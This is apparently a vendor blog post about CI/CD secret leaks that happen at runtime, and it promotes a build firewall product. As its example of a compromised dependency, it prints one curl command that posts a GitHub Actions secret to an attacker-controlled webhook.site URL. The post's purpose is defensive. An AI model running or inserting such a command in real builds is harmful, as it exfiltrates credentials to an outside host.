top of page
Search

Why Your Secrets Faucet is Still Leaking

  • Writer: David Pulaski
    David Pulaski
  • Apr 30
  • 3 min read

We all know the nightmare scenario: sensitive credentials – API keys, database passwords, private certificates – leaked into the wild. Diligent teams implement a comprehensive strategy: secure storage with secret managers (like Vault or AWS Secrets Manager), static code scanning on repositories using tools like GitGuardian or Trufflehog, promoting secure coding practices, enforcing RBAC, and rotating secrets regularly. These are essential foundational practices.


But if you're only doing these things, are you truly safe? Breaches continue to happen because many secret leaks don't originate from carelessly hardcoded secrets in your main branch. They occur dynamically, during the build process itself, slipping through the cracks of even these standard, repository-focused security methods.


Static scanners look at code at rest, and secret managers handle secure injections, but they're often blind to the runtimerisks within your CI/CD pipeline. This is where standard secret detection tools hit their limits, and where InvisiRisk Build Application Firewall (BAF) becomes essential. Let's explore a scenario where traditional methods often fail, but InvisiRisk catches the leak.

 

Scenario: The Phantom Menace (Sophisticated Script Modification Attacks)

Attackers use a variety of techniques to leverage script injections be it through malicious pull requests, un-sanitized workflows, pwn request vulnerabilities all waiting to be exploited and this is where things get truly insidious, bypassing repository checks entirely. Attackers modify scripts only while they are running to exfiltrate secrets, often erasing the evidence immediately after. As it stands, confirmed attacks using such malicious techniques have affected tens of thousands of users with the latest examples being the Ultralytics/Action Attack and the Tj-actions/changed-files compromise.


Example: A compromised dependency injects a temporary command into a build script:

curl -X POST "https://webhook.site/<user-controlled-url>?secret=${{secrets.ARTIFACT_API_KEY }}" -d "secret=${{ secrets.ARTIFACT_API_KEY }}"

 

This line executes, sending the secret, and is then removed from the running script's memory or temporary file.


Figure: Secrets leak to external user-controlled URL.
Figure: Secrets leak to external user-controlled URL.

Why Standard Strategy Fails:

 

  • Static Scanners: Are completely bypassed. The malicious code never exists in the repository they scan.

  • Secret Managers: Provide the secret as requested by the (now compromised) legitimate process but are blind to the malicious network call made using that secret.

  • Best Practices (RBAC, Rotation): Don't prevent a compromised component within an authorized process from acting maliciously at runtime. Rotation only limits damage after the leak succeeds.

 

InvisiRisk BAF Solution: This highlights InvisiRisk's multi-layered runtime defense:


InvisiRisk BAF is an advanced security platform that strengthens software build processes against supply chain threats. It offers real-time defense by applying default security policies that block known vulnerabilities, ensure the use of trusted sources, and restrict unauthorized activities during builds.

 

  • Standard Policies: Will catch the exfiltration if the destination is known-bad (Untrusted Registry Blocking) and/or the data pattern matches known secrets formats (Secret Leak Prevention).


    Figure: IR BAF’s Untrusted Registry Policy blocking untrusted source.
    Figure: IR BAF’s Untrusted Registry Policy blocking untrusted source.
    Figure: IR BAF’s Secret Leak Prevention Policy blocking secrets leak.
    Figure: IR BAF’s Secret Leak Prevention Policy blocking secrets leak.

  • AI Anomaly Detection (The Game Changer): Even if standard policies are bypassed, the AI engine detects this malicious curl command as a deviation. It compares the build's network activity to its learned baseline of normal behavior. This unexpected network call to an unknown server stands out as a high-risk anomaly, triggering an alert even without a specific rule violation.

    Figure: IR BAF’s Anomalies Detector flagging secrets leak anomaly.
    Figure: IR BAF’s Anomalies Detector flagging secrets leak anomaly.

Why a BAF with AI is Superior for Runtime Threats

Essential security hygiene like secret management and static scanning secures your code at rest and secrets at injection. However, they leave a critical gap during the runtime execution phase of your build.

InvisiRisk BAF closes this gap by:

  1. Acting as a Runtime Firewall: Monitoring actual network traffic and process activity during the build, not just static code before it runs.

  2. Enforcing Runtime Policies: Applying rules against known bad behaviors as they happen.

  3. Leveraging AI Anomaly Detection: Providing a crucial safety net against novel, evasive threats by identifying deviations from established normal build behavior – something static analysis fundamentally cannot do.

 

Protecting secrets requires looking beyond the repository and actively defending the build pipeline itself during execution. Don't let elusive runtime leaks undermine your foundational security efforts.


Discover how InvisiRisk BAF secures your builds | Request a Personalized Demo]



Comments

bottom of page